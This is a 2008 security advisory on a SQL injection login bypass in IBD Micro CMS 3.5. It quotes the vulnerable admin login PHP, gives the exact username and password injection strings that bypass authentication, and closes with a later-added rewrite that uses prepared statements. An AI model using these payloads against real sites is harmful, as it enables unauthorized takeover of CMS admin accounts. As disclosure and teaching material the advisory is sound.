
ibdmicro-sql.txt

12 May 2008, reported by SkyOut. Type: packetstorm. Source: packetstormsecurity.com

Advisory on SQL Injection (Login Bypass) in IBD Micro CMS 3.

Code
`____________________________________________________________________________  
____________________________________________________________________________  
  
01010111 01001001 01010010 01000101 01000100 01010011 ->  
01000101 01000011 01010101 01010010 01001001 01010100 ->  
01011001   
  
____________________________________________________________________________  
ADVISORY: IBD MICRO CMS 3.5 SQL INJECTION (LOGIN BYPASS)  
____________________________________________________________________________  
  
_____________________  
|| 0x00: ABOUT ME  
|| 0x01: DATELINE  
|| 0x02: INFORMATION  
|| 0x03: EXPLOITATION  
|| 0x04: RISK LEVEL  
  
____________________________________________________________  
____________________________________________________________  
  
_________________  
|| 0x00: ABOUT ME  
  
Author: SkyOut  
Date: May 2008  
Website: http://wired-security.net/  
  
_________________  
|| 0x01: DATELINE  
  
2007-05-09: Bug found  
2007-05-10: Advisory released  
  
____________________  
|| 0x02: INFORMATION  
  
The content management system Micro CMS in version 3.5 (and maybe lower versions)  
suffers from a SQL injection bug that makes it possible to log into the admin  
interface without knowing the credentials.  
  
First off, where can you find the tool:  
http://www.impliedbydesign.com/ibd-micro-cms-static-content-manager.html  
  
Direct download:  
http://www.impliedbydesign.com/files/software_downloads/microcms/microcms.zip  
  
They have taken down their demo site because of security issues. It seems they  
realized that there are some bugs, but instead of fixing them they keep the tool  
online and free for download!  
  
To make this bug exploitable "magic_quotes_gpc" has to be turned "Off"! (With it turned on, PHP  
would prepend a backslash to every double quote in the POST data, so the quotes below would not  
break out of the string literal in the query.)  
  
So let's look at the bug now...  
  
_____________________  
|| 0x03: EXPLOITATION  
  
When you download the file microcms.zip and extract it, you have the following things in your  
directory:  
  
Folder: micro_cms_files, microcms_subdirectory_example  
Files: microcms-admin-home.php, microcms-admin-login.php, microcms-index.php  
  
Let's look into the microcms-admin-login.php file:  
  
--- SNIP ---  
if ($_POST['action'] == 'admin_login') {  
$i = 0;  
if (!$_POST['administrators_username']) {  
$error[$i] = "Please enter your username.";  
$i++;  
}  
if (!$_POST['administrators_pass']) {  
$error[$i] = "Please enter a password.";  
$i++;  
}  
if ($i == 0) {  
--- SNIP ---  
  
Via the variable $i the tool checks whether both username and password have been  
set; if so, an if-clause is entered and here we go:  
  
--- SNIP ---  
if ($i == 0) {  
$sql = '  
SELECT *  
FROM microcms_administrators  
WHERE administrators_username = "' . $_POST['administrators_username'] . '" and  
administrators_pass = PASSWORD("' . $_POST['administrators_pass'] . '")';  
$user_result = mysql_query($sql);  
  
if (mysql_num_rows($user_result) < 1) {  
$error[$i] = "That username and password don't match, please try again.";  
$i++;  
} else {  
--- SNIP ---  
  
Here we have the SQL injection. The query gets built in the variable $sql from the raw POST values  
and finally executed via mysql_query($sql); the result gets saved in $user_result. If the number of  
rows is less than 1 an error has occurred, if not...  
  
So what do we have to set for username (administrators_username) and password (administrators_pass)?  
  
Username is simple: just input " or "1" = "1 ... this will make the query look right, but not for the  
password; it is a bit more tricky because of the PASSWORD() function wrapped around the value.  
Password will then be this: ") or "1" = "1" or PASSWORD("  
  
All in all we have:  
  
--- SNIP ---  
$sql = '  
SELECT *  
FROM microcms_administrators  
WHERE administrators_username = "" OR "1" = "1" and  
administrators_pass = PASSWORD("") or "1" = "1" or PASSWORD("")';  
--- SNIP ---  
  
And finally we execute this and get the following:  
  
--- SNIP ---  
$admin = mysql_fetch_array($user_result);  
$_SESSION['microcms_admin_username'] = $admin['administrators_username'];  
$_SESSION['microcms_admin_password'] = $admin['administrators_pass'];  
$_SESSION['microcms_admin_email'] = $admin['administrators_email'];  
$_SESSION['microcms_admin_id'] = $admin['administrators_id'];  
$_SESSION['microcms_admin_level'] = $admin['administrators_level'];  
header("Location:microcms-admin-home.php");  
$main_content = '<h2>You have successfully logged in!</h2><p>You may now navigate to the \  
page whose content you would like to change.</p>';  
--- SNIP ---  
  
Alright, we are logged in! Hacked!  
Do whatever you want now...  
  
___________________  
|| 0x04: RISK LEVEL  
  
- HIGH - (3/3) -  
  
<!> Happy Hacking <!>  
  
____________________________________________________________________________  
____________________________________________________________________________  
`
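The root cause above is that the POST values are spliced into the SQL text, so a quote in the username ends the string literal and the rest of the input becomes query syntax. The following is an added example, not code from the advisory or from the IBD Micro CMS package: the same login check rewritten so that the user-supplied values are bound as parameters and the password is verified in PHP. It assumes an open mysqli connection in `$db` (mysqlnd is required for `get_result()`), and it assumes that `administrators_pass` stores a `password_hash()` value instead of the output of MySQL's `PASSWORD()` function, which is unsalted and was removed in MySQL 8.0.

```php
<?php
// Added example (not IBD Micro CMS code): the query from microcms-admin-login.php
// rebuilt as a prepared statement. Assumed: $db is a connected mysqli object and
// administrators_pass holds a password_hash() value (schema change, not in the original).

function admin_login(mysqli $db, string $username, string $password): ?array
{
    // The username is sent to MySQL as a bound parameter, never as part of the SQL
    // text, so an input such as   " or "1" = "1   is compared literally against the
    // column and matches no account. magic_quotes_gpc no longer matters either way.
    $stmt = $db->prepare(
        'SELECT administrators_id, administrators_username, administrators_pass,
                administrators_email, administrators_level
           FROM microcms_administrators
          WHERE administrators_username = ?'
    );
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $admin = $stmt->get_result()->fetch_assoc();   // null when no row matched
    $stmt->close();

    // Verify the password in PHP against a salted hash instead of letting the
    // database compare PASSWORD(...) output; the password never reaches the SQL text.
    if ($admin === null || !password_verify($password, $admin['administrators_pass'])) {
        return null;   // identical outcome for unknown user and wrong password
    }
    unset($admin['administrators_pass']);   // the hash has no business in the session
    return $admin;
}

// Login handler using the same form field names as the original script.
if (($_POST['action'] ?? '') === 'admin_login') {
    $admin = admin_login(
        $db,
        $_POST['administrators_username'] ?? '',
        $_POST['administrators_pass'] ?? ''
    );
    if ($admin === null) {
        $error[] = "That username and password don't match, please try again.";
    } else {
        session_regenerate_id(true);   // new session id on privilege change
        $_SESSION['microcms_admin_id']       = $admin['administrators_id'];
        $_SESSION['microcms_admin_username'] = $admin['administrators_username'];
        $_SESSION['microcms_admin_email']    = $admin['administrators_email'];
        $_SESSION['microcms_admin_level']    = $admin['administrators_level'];
        header('Location: microcms-admin-home.php');
        exit;   // the original keeps executing after header(); stop here instead
    }
}
```

Two design points beyond the injection itself: the original copies the password hash into `$_SESSION`, which is dropped here, and the original does not `exit` after `header()`, so the rest of the script keeps running for a redirected request. For an existing install where the column still holds `PASSWORD()` output, the rows would need to be migrated to `password_hash()` values (for example on each user's next successful login) before this check can replace the old one.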
